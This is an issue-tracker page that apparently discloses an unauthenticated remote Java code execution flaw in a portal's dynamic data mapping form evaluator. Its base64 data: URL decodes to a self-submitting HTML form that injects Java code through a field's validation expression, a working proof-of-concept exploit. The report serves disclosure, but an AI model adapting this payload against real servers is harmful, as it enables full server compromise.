Details

      Description

      Any user can remotely execute any Java code on the server

      Steps to reproduce:
      1, Copy and paste to browser URL bar:

      data:text/html;base64,PGJvZHkgb25sb2FkPWRvY3VtZW50LmZvcm1zWzBdLnN1Ym1pdCgpPgo8Zm9ybSBhY3Rpb249aHR0cDovL2xvY2FsaG9zdDo4MDgwL28vZHluYW1pYy1kYXRhLW1hcHBpbmctZm9ybS1ldmFsdWF0b3IvYSBtZXRob2Q9cG9zdD4KPGlucHV0IG5hbWU9bGFuZ3VhZ2VJZCB2YWx1ZT1lbj4KPGlucHV0IG5hbWU9c2VyaWFsaXplZERETUZvcm1WYWx1ZXMgdmFsdWU9J3siYXZhaWxhYmxlTGFuZ3VhZ2VJZHMiOlsiZW4iXSwiZGVmYXVsdExhbmd1YWdlSWQiOiJlbiIsImZpZWxkVmFsdWVzIjpbeyJpbnN0YW5jZUlkIjoiYWJjZCIsICJuYW1lIjoiVGV4dCBCb3giLCAidmFsdWUiOiJ0ZXh0LXZhbHVlIn1dfSc+CjxpbnB1dCBuYW1lPXNlcmlhbGl6ZWRERE1Gb3JtIHZhbHVlPSd7ImF2YWlsYWJsZUxhbmd1YWdlSWRzIjpbImVuIl0sImRlZmF1bHRMYW5ndWFnZUlkIjoiZW4iLCJmaWVsZHMiOlt7Im5hbWUiOiJUZXh0IEJveCIsInR5cGUiOiJ0ZXh0IiwgInZhbGlkYXRpb24iOnsiZXhwcmVzc2lvbiI6Ii8qXCIqL25ldyBPYmplY3QoKXtwdWJsaWMgYm9vbGVhbiBydW4oKSB7U3lzdGVtLm91dC5wcmludGxuKFwiUmVtb3RlIENvZGUgRXhlY3V0aW9uIVwiKTtyZXR1cm4gdHJ1ZTt9fS5ydW4oKS8qXCIqLyIsImVycm9yTWVzc2FnZSI6IkZhaWxlZCJ9fV19Jz4KPC9mb3JtPg==

      Expected result: no "Remote Code Execution" in logs
      Actual result: "Remote Code Execution" in server logs


      CVSS Base Score: 10
      CVSS Temporal Score: 9
      CVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C/E:P/RL:U/RC:C)
      

        Attachments

          Issue Links

            Activity

              People

              • Votes:
                0 Vote for this issue
                Watchers:
                3 Start watching this issue

                Dates

                • Created:
                  Updated:
                  Resolved:
                  Days since last comment:
                  3 years, 26 weeks, 5 days ago

                  Packages

                  Version Package
                  7.0.0 Beta 7